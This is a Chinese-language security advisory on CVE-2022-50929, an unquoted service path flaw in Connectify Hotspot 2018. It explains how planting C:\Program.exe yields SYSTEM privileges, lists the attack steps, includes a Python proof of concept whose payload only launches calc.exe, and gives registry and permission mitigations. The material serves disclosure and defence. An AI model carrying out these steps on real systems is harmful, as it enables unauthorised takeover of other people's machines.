CVE-2022-50929 Connectify Hotspot未引号服务路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2022-50929

漏洞类型

未引号服务路径权限提升

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Connectify Hotspot 2018

漏洞概述

CVE-2022-50929是Connectify Hotspot 2018软件中存在的一个高危安全漏洞，CVSS评分达到8.4分。该漏洞属于Windows服务路径解析安全问题，官方名称为"Unquoted Service Path"（未引号服务路径）。漏洞的根本原因在于ConnectifyService服务在Windows系统中的可执行文件路径未使用引号进行完整包裹，导致系统在进行服务路径解析时可能出现歧义。攻击者可以利用这一特性，在特定位置植入恶意可执行文件，当服务启动时，系统会优先执行攻击者植入的恶意程序，从而实现本地权限提升。由于该漏洞的攻击复杂度较低，无需认证和用户交互即可实施，因此对使用受影响版本Connectify Hotspot的用户构成严重安全威胁。建议相关用户及时采取修复措施，避免系统被恶意控制。

技术细节

该漏洞的技术原理基于Windows操作系统对服务可执行文件路径的解析机制。当一个Windows服务的可执行文件路径包含空格且未使用引号完整包裹时，系统会从路径开头开始解析，并在遇到空格时将其作为路径分隔符处理。以本次漏洞为例，ConnectifyService服务的路径为'C:\Program Files (x86)\Connectify\ConnectifyService.exe'，由于路径中'Program'和'Files'之间存在空格，且整个路径未被引号包裹，系统会首先尝试执行'C:\Program.exe'。攻击者可以利用这一特性，在'C:\'目录下放置名为'Program.exe'的恶意可执行文件。当ConnectifyService服务启动、重启或系统重启时，Windows服务控制管理器（SCM）会按照路径解析规则优先执行攻击者植入的恶意程序。由于ConnectifyService通常以SYSTEM或更高权限账户运行，恶意程序也将继承相应的高权限，从而实现本地权限提升。攻击者成功利用此漏洞后，可以完全控制受影响的系统，执行任意代码、安装恶意软件、窃取敏感数据或建立持久化后门。

攻击链分析

STEP 1

步骤1

攻击者首先检查目标系统是否安装了Connectify Hotspot 2018，并确认ConnectifyService服务是否存在且路径未加引号

STEP 2

步骤2

攻击者获取目标系统的本地写入权限，通常通过低权限账户或配合其他漏洞实现

STEP 3

步骤3

攻击者在服务路径的父目录（C:\）下创建一个名为'Program.exe'的恶意可执行文件，该文件包含后门代码或恶意payload

STEP 4

步骤4

等待触发条件发生，包括服务重启、系统重启或服务崩溃自动恢复等事件

STEP 5

步骤5

Windows服务控制管理器在启动服务时按照路径解析规则，优先执行攻击者植入的'C:\Program.exe'文件

STEP 6

步骤6

恶意程序以SYSTEM或更高权限账户的身份执行，攻击者成功实现本地权限提升，完全控制目标系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2022-50929 PoC - Connectify Hotspot Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in Connectify Hotspot
# Author: Security Researcher
# Date: 2022

import os
import sys
import subprocess
import ctypes

def check_privileges():
    """Check if running with administrator privileges"""
    try:
        is_admin = ctypes.windll.shell32.IsUserAnAdmin()
        return is_admin != 0
    except:
        return False

def check_vulnerable_service():
    """Check if ConnectifyService is installed and vulnerable"""
    try:
        result = subprocess.run(
            ['sc', 'qc', 'ConnectifyService'],
            capture_output=True,
            text=True
        )
        if result.returncode == 0:
            output = result.stdout
            if 'BINARY_PATH_NAME' in output:
                # Check if path is unquoted
                for line in output.split('\n'):
                    if 'BINARY_PATH_NAME' in line:
                        path = line.split(':', 1)[1].strip()
                        if '"' not in path and ('Program Files' in path or 'Connectify' in path):
                            print(f"[VULNERABLE] Unquoted path detected: {path}")
                            return True, path
        return False, None
    except Exception as e:
        print(f"Error checking service: {e}")
        return False, None

def create_payload(payload_path):
    """Create a simple payload that writes to a log file"""
    try:
        # Simple C++ payload that executes calc.exe and logs activity
        payload_code = '''
#include <windows.h>
#include <fstream>
using namespace std;

int main() {
    // Log exploitation attempt
    ofstream logFile("C:\\\\exploit_log.txt", ios::app);
    logFile << "[!] Exploit executed at " << __TIME__ << endl;
    logFile.close();
    
    // Execute calc.exe as demonstration
    system("calc.exe");
    
    return 0;
}
'''
        with open(payload_path.replace('.exe', '.cpp'), 'w') as f:
            f.write(payload_code)
        print(f"[+] Payload source code written to {payload_path}.cpp")
        print("[!] Compile the payload and name it 'Program.exe'")
        return True
    except Exception as e:
        print(f"Error creating payload: {e}")
        return False

def main():
    print("="*60)
    print("CVE-2022-50929 PoC - Connectify Hotspot Unquoted Service Path")
    print("="*60)
    
    if not check_privileges():
        print("[-] This exploit requires administrator privileges")
        print("[*] Please run as administrator")
        sys.exit(1)
    
    print("[+] Running with administrator privileges")
    
    is_vulnerable, service_path = check_vulnerable_service()
    
    if is_vulnerable:
        print(f"[+] ConnectifyService is VULNERABLE")
        print(f"[+] Service path: {service_path}")
        print("\n[*] Attack vector:")
        print("    1. Place malicious 'Program.exe' in C:\\")
        print("    2. Wait for service restart or system reboot")
        print("    3. Malicious code executes with SYSTEM privileges")
        
        # Demonstrate the attack path
        attack_path = r"C:\Program Files (x86)\Connectify\ConnectifyService.exe"
        print(f"\n[*] Vulnerable path breakdown:")
        print(f"    {attack_path}")
        print(f"    -> System tries: C:\Program.exe (first)")
        print(f"    -> Then: C:\Program Files\ConnectifyService.exe")
        print(f"    -> Finally: C:\Program Files (x86)\Connectify\ConnectifyService.exe")
        
        # Create payload
        create_payload(r"C:\Program.exe")
    else:
        print("[-] ConnectifyService is not vulnerable or not installed")

if __name__ == "__main__":
    main()

影响范围

Connectify Hotspot 2018 < 修复版本

防御指南

临时缓解措施

在官方修复补丁发布之前，可采取以下临时缓解措施：首先，将ConnectifyService服务的路径使用引号完整包裹，具体操作是在注册表编辑器中找到'HKLM\SYSTEM\CurrentControlSet\Services\ConnectifyService'项，修改ImagePath值为'"C:\Program Files (x86)\Connectify\ConnectifyService.exe"'；其次，限制C:\根目录的写入权限，移除普通用户在该目录创建文件的权限；最后，考虑暂时停止ConnectifyService服务或卸载Connectify Hotspot软件，直至官方发布安全更新。